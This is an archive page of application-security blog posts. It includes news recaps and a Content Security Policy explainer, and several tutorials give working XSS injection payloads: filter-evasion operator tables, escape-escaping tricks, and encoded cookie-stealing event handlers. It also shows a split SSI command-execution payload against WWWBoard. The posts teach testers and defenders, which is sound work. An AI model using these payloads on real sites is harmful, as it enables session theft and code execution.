Tag Archives: Cross Site Scripting

#HackerKast 13 Bonus Round: FlashFlood – JavaScript DoS

In this week’s HackerKast bonus footage, I wrote a little prototype demonstrator script that shows various concepts regarding JavaScript flooding. I’ve run into the problem before where people seem to not understand how this works, or even that it’s possible to do this, despite multiple attempts at trying to explain it over the years. So, it’s demo time! This is not at all designed to take down a website by itself, though it could add extra strain on the system.

What you might find though, is that heavy database driven sites will start to falter if they rely on caching to protect themselves. Specifically Drupal sites tend to be fairly prone to this issue because of how Drupal is constructed, as an example.

It works by sending tons of HTTP requests using different paramater value pairs each time, to bypass caching servers like Varnish. Ultimately it’s not a good idea to ever use this kind of code as an adversary because it would be flooding from their own IP address. So instead this is much more likely to be used by an adversary who tricks a large swath of people into executing the code. And as Matt points out in the video, it’s probably going to end up in XSS code at some point.

Anyway, check out the code here. Thoughts are welcome, but hopefully this makes some of the concepts a lot more clear than our previous attempts.

Infancy of Code Vulnerabilities

I was reading something about modern browser behavior and it occurred to me that I hadn’t once looked at Matt’s Script Archive from the mid 1990s until now. I kind of like looking at old projects through the modern lens of hacking knowledge. What if we applied some of the modern day knowledge about web application security against 20-year-old tech? So I took at look at the web-board. According to Google there are still thousands of installs of WWWBoard lying around the web:

http://www.scriptarchive.com/download.cgi?s=wwwboard&c=txt&f=wwwboard.pl

I was a little disappointed to see the following bit of text. It appears someone had beat me to the punch – 18 years ago!

# Changes based in part on information contained in BugTraq archives
# message 'WWWBoard Vulnerability' posted by Samuel Sparling Nov-09-1998.
# Also requires that each followup number is in fact a number, to
# prevent message clobbering.

In taking a quick look there have been a number of vulns found in it over the years. Four CVEs in all. But I decided to take a look at the code anyway. Who knows – perhaps some vulnerabilities have been found but others haven’t. After all, this has been nearly 12 years since the last CVE was announced.

Sure enough its actually got some really vulnerable tidbits in it:

# Remove any NULL characters, Server Side Includes
$value =~ s/\0//g;
$value =~ s/<!--(.|\n)*-->//g;

The null removal is good, because there’s all kinds of ways to sneak things by Perl regex if you allow nulls. But that second string makes me shudder a bit. This code intentionally blocks typical SSI like:

<!--#exec cmd="ls -al" -->

But what if we break up the code? We’ve done this before for other things – like XSS where filters prevented parts of the exploit so you had to break it up into two chunks to be executed together once the page is re-assembled. But we’ve never (to my knowledge) talked about doing that for SSI! What if we slice it up into it’s required components where:

Subject is: <!--#exec cmd="ls -al" echo='
Body is: ' -->

That would effectively run SSI code. Full command execution! Thankfully SSI is all but dead these days not to mention Matt’s project is on it’s deathbed, so the real risk is negligible. Now let’s look a little lower:

$value =~ s/<([^>]|\n)*>//g;

This attempts to block any XSS. Ironically it should also block SSI, but let’s not get into the specifics here too much. It suffers from a similar issue.

Body is: <img src="" onerror='alert("XSS");'

Unlike SSI I don’t have to worry about there being a closing comment tag – end angle brackets are a dime a dozen on any HTML page, which means that no matter what this persistent XSS will fire on the page in question. While not as good as full command execution, it does work on modern browser more reliably than SSI does on websites.

As I kept looking I found all kinds of other issues that would lead the board to get spammed like crazy, and in practice when I went hunting for the board on the Internet all I could find were either heavily modified boards that were password protected, or broken boards. That’s probably the only reason those thousands of boards aren’t fully compromised.

It’s an interesting reminder of exactly where we have come from and why things are so broken. We’ve inherited a lot of code, and even I still have snippets of Matt’s code buried in places all over the web in long forgotten but still functional code. We’ve inherited a lot of vulnerabilities and our knowledge has substantially increased. It’s really fascinating to see how bad things really were though, and how little security there really was when the web was in it’s infancy.

#HackerKast 10: XSS Vulnerability in jQuery, Let’s Encrypt, and Google Collects Personal Info

We kicked off this week’s episode chatting about a new XSS vulnerability that was uncovered in the very popular jQuery Validation Plugin. This plugin is used widely as a simple form validator and the researcher, Sijmen Ruwhof, found the bug in the plugin’s CAPTCHA implementation. This bug was very widespread, with a few Google dorks showing at least 12,000 websites easily identified as using it, and another 300,000 – 1 million websites potentially using it, or similar vulnerable code. The piece that was amusing for all of us about this story was that Ruwhof disclosed the bug privately to both the author and to jQuery back in August and received no response. After doing some digging the bug was already in OSVDB from 2013 with no action taken. After warning the plugin’s author and writing the blog post on the research publicly, the bug was closed within 17 hours. A nice little case study on Full Disclosure.

Next, Jeremiah covered the launch of new certificate authority called Let’s Encrypt. This kind of thing wouldn’t normally be news since there are a ton of CAs out there already but what makes Let’s Encrypt interesting is the fact that it is a non-profit, *FREE*, certificate authority. The project is backed by EFF, Mozilla, Cisco, Akamai, IdenTrust, and University of Michigan researchers and is focusing on being free and easy-to-use to reduce the barrier to entry of encrypting your web traffic. Robert brings up a good question of browser support, if Microsoft or Google doesn’t support this right away it really only helps the 20% or so of the users using Firefox. The other question here is what effect this will have on for-profit Certificate Authorities.

Now we of course had to mention the blog post that went somewhat viral recently about all the information Google is collecting about you. None of this was terribly surprising to many of us in this industry but was certainly eye-opening for a lot of people out there. You can easily look up their advertising profile on you, which was hilariously inaccurate for me and a few others who were posting their info online (contrary to popular belief I’m not into Reggaeton). However, the creepy one for me was the “Location History” which was *extremely* precise.

These 6 links hitting the blogosphere had good timing as Mozilla also announced that they will be switching the default search engine used in FireFox to be Yahoo. This is HUGE news considering somewhere upwards of 95% of Mozilla’s revenue comes from the fact that Google pays to be the default engine. FireFox also still has 20% market share of browser users all of whom will be using significantly less Google these days.

Robert also dug up a story about a recent ruling from a judge in the United States that said the police are allowed to compel people for any sort of biometric-based authentication but not password-based. For example, a judge has said it is perfectly legal for police to force you to use your fingerprint to unlock your iPhone but still not so for a four-digit-pin. This has all sorts of interesting implications when it comes to information security and personal privacy when it comes to law enforcement.

With absolutely no segway we covered a new story about China which seems to be one of Robert’s favorite topics. Turns out that China came out with a list of a ton of new websites they blocked from anybody accessing and one that stood out was Edgecast. Edgecast was particularly interesting because on it’s own it isn’t a website worth noting but they are a CDN which means China has blocked all of their customers as well which could affect hundreds of thousands of sites. The comparison was made of it being like blocking Akamai. Will be fascinating to see what the repercussions of this are as we go.

Closed out this week just chatting about some extra precautions we are all taking these days in the modern dangerous web. Listen in for a few tips!

Resources:
Cross-site scripting in millions of websites
Let’s Encrypt- It’s free, automated and open
6 links that will show you what Google knows about you
After this judge’s ruling, do you finally see value in passwords?
China just blocked thousands of websites

#HackerKast 8: Recap ofJPMC Breach, Hacking Rewards Programs and TOR Version of Facebook

After making fun of RSnake being cold in Texas, we started off this week’s HackerKast, with some discussion about the recent JP Morgan breach. We received more details about the breach that affected 76 million households last month, including confirmation that it was indeed a website that was hacked. As we have seen more often in recent years, the hacked website was not any of their main webpages but a one-off brochureware type site to promote and organize a company-sponsored running race event.

This shift in attacker focus has been something we in the AppSec world have taken notice of and are realizing we need to protect against. Historically, if a company did any web security testing or monitoring, the main (and often only) focus was on the flagship websites. Now we are all learning the hard way that tons of other websites, created for smaller or more specific purposes, happen either to be hooked up to the same database or can easily serve as a pivot point to a server that does talk to the crown jewels.

Next, Jeremiah touched on a fun little piece from our friend Brian Krebs over at Krebs On Security who was pointing out the value to attackers in targeting credit card rewards programs. Instead of attacking the card itself, the blackhats are compromising rewards websites, liquidating the points and cashing out. One major weakness that is pointed out here is that most of these types of services utilize a four-digit pin to get to your reward points account. Robert makes a great point here that even if they move from four-digit pins to a password system, they stop can make it more difficult to brute force, but if the bad guys find value here they’ll just update current malware strains to attack these types of accounts.

Robert then talked about a new TOR onion network version of Facebook that has begun to get set up for the sake of some anonymous usage of Facebook. There is the obvious use of people trying to browse at work without getting in trouble, but the more important use is for people in oppressive countries who want to get information out and not worry about prosecution and personal safety.

I brought up an interesting bug bounty that was shared on the blogosphere this week by a researcher named von Patrik who found a fun XSS bug in Google. I was a bit sad (Jeremiah would say jealous) that he got $5,000 for the bug but it was certainly a cool one. The XSS was found by uploading a JSON file to a Google SEO service called Tag Manager. All of the inputs on Tag Manager were properly sanitized in the interface but they allowed you to upload this JSON file which had some additional configs and inputs for SEO tags. This file was not sanitized and an XSS injection could be stored making it persistent and via file upload. Pretty juicy stuff!

Finally we wrapped up talking about Google some more with a bypass of Gmail two-factor authentication. Specifically, the attack in question here was going after the text message implementation of the 2FA and not the tokenization app that Google puts out. There are a list of ways that this can happen but the particular, most recent, story we are talking about involves attackers calling up mobile providers and social engineering their way into accessing text messages to get the second factor token to help compromise the Gmail account.

That’s it for this week! Tune in next week for your AppSec “what you need to know” cliff notes!

Resources:
J.P. Morgan Found Hackers Through Breach of Road-Race Website
Thieves Cash Out Rewards, Points Accounts
Why Facebook Just Launched Its Own ‘Dark Web’ Site
[BugBounty] The 5000$ Google XSS
How Hackers Reportedly Side-Stepped Google’s Two-Factor Authentication

Content Security Policy

What is it and why should I care?
Content Security Policy (CSP) is a new(ish) technology put together by Mozilla that Web apps can use as an additional layer of protection against Cross-Site Scripting (XSS). This protection against XSS is the primary goal of CSP technology. A secondary goal is to protect against clickjacking.

XSS is a complex issue, as is evident by the recommendations in the OWASP prevention “cheat sheets” for XSS in general and DOM based XSS. Overall, CSP does several things to help app developers deal with XSS.

Whitelist Content Locations
One reason XSS is quite harmful is that browsers implicitly trust the content received from the server, even if that content has been manipulated and is loading from an unintended location. This is where CSP provides protection from XSS: CSP allows app developers to declare a whitelist of trusted locations for content. Browsers that understand CSP will then respect that list, load only content from there, and ignore content that references locations outside the list.

No Inline Scripts
XSS is able to add scripts inline to content, because browsers have no way of knowing whether the site actually sent that content, or if an attacker added the script to the site content. CSP entirely prevents this by forcing the separation of content and code (great design!). However, this means that you must move all of your scripts to external files, which will require work for most apps − although it can be done. The upside of needing to follow this procedure is that in order for an attack to be successful with CSP, an attacker must be able to:
Step 1.  Inject a script tag at the head of your page
Step 2.  Make that script tag load from a trusted site within your whitelist
Step 3.  Control the referenced script at that trusted site

Thus, CSP makes an XSS attack significantly more difficult.

Note: One question that consistently comes up is what about event handling? Yes, CSP still allows event handling through the onXXX handlers or the addEventListener mechanism.

No Code from Strings (eval dies)
Another welcome addition to CSP is the blacklisting of functions that create code from strings. This means that usage of the evil eval is eliminated (along with a few other evals). Creating code from strings is a popular attack technique − and is rather difficult to trace − so the removal of all such functions is actually quite helpful.

Another common question stemming from the use of CSP is how to deal with JSON parsing. From a security perspective, the right way to do this has always been to actually parse the JSON instead of doing an eval anyway; and because this functionality is still available, nothing needs to change in this regard.

Policy Violation Reporting
A rather cool feature of CSP is that you can configure your site to have a violation reporting handler, which then lets you have that data available whether you run in either report-only mode or enforcing mode. In report-only mode, you can get reports of locations in your site where execution will be prevented when you enable CSP (a nice way to test). In enforcing mode, you will also get this data; while in production, you can also use this method as a simple XSS detection mechanism (resulting in “bad guy tried XSS and it didn’t run”).

What should I do about the availability of CSP?

Well, you should use it! Actually, CSP seems to be free from having any downside. It’s there to make your site safer, and even if a client’s browser does not support it, it is entirely backwards-compatible, so your site will not break for the client.

In general, I think the basic approach with CSP should be:

Step 1.  Solve XSS through your standard security development practices (you should already be doing this)
Step 2.  Learn about CSP – read the specs thoroughly
Step 3.  Make the changes to your site; then test and re-test (normal dev process)
Step 4.  Run in report-only mode and monitor any violations in order to find areas you still need to fix (this step can be skipped if you have a fully functional test suite that you can execute against your app in testing – good for you, if you do!)
Step 5. After you’re confident that your site is working properly, turn it on to the enforcing mode

As for how you actually implement CSP, you have two basic options: (1) an HTTP header, and (2) a META tag. The header option is preferred, and an example is listed below:

Content-Security-Policy: default-src ‘self';

img-src *;

object-src media1.example.com media2.example.com *.cdn.example.com;

script-src trustedscripts.example.com;

report-uri http://example.com/post-csp-report

The example above says the following:

Line 1: By default, only allow content from ‘self’ or from the site represented by the current url
Line 2: Allow images from anywhere
Line 3: Allow objects from only the listed urls
Line 4: Allow scripts from only the listed url
Line 5: Use the listed url to report any violations of the specified policy

In summary, CSP is a very interesting and useful new technology to help battle XSS. It’s definitely a useful tool to add to your arsenal.

References
________________________________________________________
https://developer.mozilla.org/en/Introducing_Content_Security_Policy
https://dvcs.w3.org/hg/content-security-policy/raw-file/tip/csp-specification.dev.html
https://wiki.mozilla.org/Security/CSP/Design_Considerations
https://wiki.mozilla.org/Security/CSP/Specification
https://dvcs.w3.org/hg/content-security-policy/raw-file/bcf1c45f312f/csp-unofficial-draft-20110303.html
http://www.w3.org/TR/CSP/
http://blog.mozilla.com/security/2009/06/19/shutting-down-xss-with-content-security-policy/
https://mikewest.org/2011/10/content-security-policy-a-primer
http://codesecure.blogspot.com/2012/01/content-security-policy-csp.html
https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet
http://blog.spiderlabs.com/2011/04/modsecurity-advanced-topic-of-the-week-integrating-content-security-policy-csp.html

It’s a DOM Event

All user input must be properly escaped and encoded to prevent cross-site scripting. While the idea of sanitizing user input is nothing new to most developers, many of them encode special characters and fail to account for how the resulting document will handle the input. HTML encoding without proper escaping can lead to malicious code execution in the DOM.

Be sure to note that all of the following descriptions and comments are dependent on how the application output encodes the related content and, therefore, may not reflect the actual injection.

 

HTML Events

HTML events serve as a method to execute client-side script when related conditions are met within the contained HTML document. User-supplied input can be encoded in the related HTML; however, when the condition of the event is met, the document will decode the injection before sending it to the javascript engine for interpretation. Consider the example below of an embedded image that evaluates “userInput” when a user clicks on the image:

<img src="CoolPic.jpg" onclick="doSomethingCool('userInput');" />

Now here’s the same image that has been hi-jacked by an attacker with an encoded payload:

<img src="CoolPic.jpg" onclick="doSomethingCool('userInput&#000000039;);sendHaxor(document.cookie);//');" />

The hacker’s injection uses HTML decimal entity encoding with multiple zeros to show support for padding. When a user interacts with the altered image, the DOM will evaluate the original function, followed by the hacker’s injection, followed by double slashes to clean up any trailing residue from the original syntax. All of the character encoding presented immediately below will work across all current browsers, with the exception of HTML name entity apostrophe in Internet Explorer.

 

Vulnerable HTML Encoding

 

Javascript HREF/SRC

When javascript is referenced in either HREF or SRC of an HTML element an attacker can achieve code injection using the same method as above, but with the additional support for URL hex encoding. The DOM will construct the related javascript location before evaluating its contents. Here’s a dynamic link that, when followed, does something “cool” with user input:

<a href="doSomethingCool('userInput');">Cool Link</a>

The hacker likes the “super-cool” link so much that he decides to add his own content to capture the user’s session:

<a href="doSomethingCool('userInput%27);sendHaxor(document.cookie);//');">Cool Link</a>

 

Remediation

The lesson to be learned here is that encoding alone may not be enough to solve cross-site scripting. Therefore, encode all special characters to prevent an attacker from breaking the resulting HTML; escape each character to prevent breaking any related javascript; and, of course, always remember to escape the escapes.

<img src="CoolPic.jpg" onclick="doSomethingCool('userInput\\\&#39;);attackerBlocked();//');" />

 
Jason Calvert @mystech7
Application Security Engineer
WhiteHat Security, Inc.

Escaping Escapes

Sometimes a server will escape special characters that are injected: For instance, injecting a " character and having it reflect as \":

Injection: xss"
Reflection:

x="xss\"";y=42;

Fail.

Sometimes, ironically enough, you can outsmart filters by using their own tricks against them. Try escaping their escape character like this:

Injection: xss\"
Reflection:

x="xss\\"";y=42;

Success!

However, if the server escapes your injected \ as \\, this technique will not work:

Injection: xss\"
Reflection:

x="xss\\\"";y=42;

Not fun.

If you’re able to break out by escaping their escape, you’ll need to blend back in with something other than a ", because the escaping process breaks the syntax:

Injection: xss\"*alert(1)*\"
Reflection:

x="xss\\"*alert(1)*\\"";y=42;

The *\\ following alert(1) is not valid syntax and will cause an error.

So…

Injection: xss\"*alert(1)//
Reflection:

x="xss\\"*alert(1)//";y=42;

Commenting out the rest is your best bet, unless they escape your // like \/\/. When this happens, I don’t think there’s much you can do.

Escaping escapes reminds me of the classic movie moment, when a bad guy gets the drop on a good guy, but then another good guy gets the drop on the bad guy. It always cracks me up when this evasion technique works.

Anatomy of an XSS Injection

I love XSS, especially in JavaScript space. It’s like a puzzle. Sometimes it’s a four-piece jumbo jigsaw puzzle, like landing in an empty script tag with no filtering or encoding, but other times it’s a 10,000-piece mystery, requiring a complex injection to overcome multiple obstacles. Either way, it’s always satisfying when that ‘1’, ‘xss’, or ‘lol’ pops up in an alert window.

Break Out, Execute Payload, Blend In

There are typically three pieces to an XSS injection: break out, execute payload, and blend in.  Consider the following:

Injection:  xss
Reflection:

<script>x="xss";y=42;</script>

In order to execute payload, we have to break out of the double-quoted string we’re landing in.

Injection (break out):  xss";
Reflection:

<script>x="xss";";y=42;</script>

We’ve now broken out and terminated the x= line of code; it’s time to inject some payload.

Injection (break out + execute payload):  xss";alert(1);
Reflection:

<script>x="xss";alert(1);";y=42;</script>

Our payload is in place, but the "; following our injection is not proper syntax and will cause an error; we need to blend back in to the remaining code.

Injection (break out + execute payload + blend in):  xss";alert(1);//
Reflection:

<script>x="xss";alert(1);//";y=42;</script>

By adding a comment, our injection now results in syntactically correct code that will execute our payload successfully.

Sometimes there’s nothing to break out of or blend back into, but often both are necessary in some degree to ensure that the code is syntactically valid and that the payload is executable.

Complex Breakouts

Sometimes the code path doesn’t allow your injection to fire, like when landing inside a function that’s never called on the page. In those instances, assuming that you can’t use </script> to break out, you must break out of any strings you’re in, as well as the actual function.  Furthermore, the end of your injection must blend back in to whatever code follows:

Injection:  xss
Reflection:

function neverCalledOnThePage()
{
x="xss";
}

Injection:  xss"}alert(1);if(0){//
Reflection:

function neverCalledOnThePage()
{
x="xss"}alert(1);if(0){//";
}

Helpful tips for dealing with this type of scenario are highly dependent on context, so I won’t go into any more detail here. Basically, break out from as little as is needed in order to get into executed space, and be as minimalistic as possible when blending back in to the code (use a comment, if possible). Replicating exactly what was present before you broke out is usually not necessary; however, referencing what was present is useful when crafting a syntactically correct blend back in to the code.

Filter Evasion: Concatenation & JavaScript Operators

In my previous post, I talked about the basic anatomy of an XSS injection: break out, execute payload, and blend in. While the anatomy is simple in principle, things can become more complex when filters, escaping, and encoding enter the mix.

One of the examples I used in the previous post was as follows:

Injection: xss";alert(1);//
Reflection:

<script>x="xss";alert(1);//";y=42;</script>

Staying with this example, let’s say we are unable to add any of the following characters: / < > ; What then? Some of you are familiar with using string concatenation to execute XSS, like this:

Injection: xss"%2balert(1)%2b"
Reflection:

<script>x="xss"+alert(1)+"";y=42;</script>

In JavaScript, the ‘+’ is simply an operator. How it will be interpreted will differ depending on the context. In some cases (x="hi "+"there"), it will be seen as string concatenation; but when applied to numbers (x=40+2), it will be seen as a mathematical operator. Because JavaScript checks basic syntax only before executing, operators other than the ‘+’ can be used; for example, an asterisk:

Injection: "*alert(1)*"
Reflection:

<script>x=""*alert(1)*"";y=42;</script>

Used as a mathematical operator, the asterisk obviously will not compute anything meaningful when applied to strings (unless the strings can be parsed as numeric, like x="6"*"7"), so the JavaScript engine will readily accept the injection because it is syntactically correct.

The engine must first evaluate the alert(1) function call before it can evaluate the strings and asterisks. This is like the order of operations in mathematics: 3*2+1=7, but 3*(2+1)=9.  That is, the parentheses take precedence in the order of operations, just as the alert(1) function call takes precedence in the order of execution with code.  And, therefore, as long as valid JavaScript operators connect the function call to the surrounding operands, all will be merry and grand in the land of exploits.

Assuming there are no filtering obstacles to overcome, the following mathematical, logical, and bitwise operators can be used in our injection without violating syntax, and will result in our alert being executed:

Operator Injection Reflection
Addition & String Concatenation "%2balert(1)%2b" <script>x=""+alert(1)+"";y=42;</script>
Subtraction "-alert(1)-" <script>x=""-alert(1)-"";y=42;</script>
Multiplication "*alert(1)*" <script>x=""*alert(1)*"";y=42;</script>
Division "/alert(1)/" <script>x=""/alert(1)/"";y=42;</script>
Modulus; %25 needs to reflect as %. "%25alert(1)%25" <script>x=""%alert(1)%"";y=42;</script>
“Less Than” Comparison "<alert(1)<" <script>x=""<alert(1)<"";y=42;</script>
“Greater Than” Comparison ">alert(1)>" <script>x="">alert(1)>"";y=42;</script>
“Less Than or Equal To” Comparison "<=alert(1)<=" <script>x=""<=alert(1)<="";y=42;</script>
“Greater Than or Equal To” Comparison ">=alert(1)>=" <script>x="">=alert(1)>="";y=42;</script>
“Equal To” Comparison "==alert(1)==" <script>x=""==alert(1)=="";y=42;</script>
Strong-Typed “Equal To” Comparison "===alert(1)===" <script>x=""===alert(1)==="";y=42;</script>
“Not Equal To” Comparison "!=alert(1)!=" <script>x=""!=alert(1)!="";y=42;</script>
Logical “and”; %26 needs to reflect as &. "%26%26alert(1)%26%26" <script>x=""&&alert(1)&&"";y=42;</script>
Logical “or”; Note: will only result in payload executing if preceding string is evaluated as “false” by the JS engine, like an empty string. "||alert(1)||" <script>x=""||alert(1)||"";y=42;</script>
Bitwise “and”; %26 needs to reflect as &. "%26alert(1)%26" <script>x=""&alert(1)&"";y=42;</script>
Bitwise “or” "|alert(1)|" <script>x=""|alert(1)|"";y=42;</script>
Bitwise “xor” "^alert(1)^" <script>x=""^alert(1)^"";y=42;</script>
Bitwise Left Shift "<<alert(1)<<" <script>x=""<<alert(1)<<"";y=42;</script>
Bitwise Right Shift ">>alert(1)>>" <script>x="">>alert(1)>>"";y=42;</script>
Bitwise Right Shift With Zeros ">>>alert(1)>>>" <script>x="">>>alert(1)>>>"";y=42;</script>
Ternary Conditional Expression "?alert(1):" <script>x=""?alert(1):"";y=42;</script>

 

You may be asking, “Why bother listing << if simply < can be used?” I’m so glad you asked!  The answer is this: Every application is unique, and you never know when < might get filtered out, while << does not.

Overall it’s always good to know as many options as possible, because even the most unlikely one may end up being the key.